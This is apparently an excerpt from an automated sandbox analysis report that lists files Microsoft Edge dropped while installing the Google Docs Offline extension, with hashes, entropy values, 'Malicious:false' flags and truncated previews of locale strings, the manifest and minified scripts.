                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1263
                                                                                                                                                                                                                                                                Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1074
                                                                                                                                                                                                                                                                Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):879
                                                                                                                                                                                                                                                                Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1205
                                                                                                                                                                                                                                                                Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):843
                                                                                                                                                                                                                                                                Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):912
                                                                                                                                                                                                                                                                Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):11406
                                                                                                                                                                                                                                                                Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):854
                                                                                                                                                                                                                                                                Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2525
                                                                                                                                                                                                                                                                Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):97
                                                                                                                                                                                                                                                                Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):122218
                                                                                                                                                                                                                                                                Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):291
                                                                                                                                                                                                                                                                Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):130866
                                                                                                                                                                                                                                                                Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\f0b52654-90bc-46a6-9613-777151c62a35.tmp

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                Malicious:false
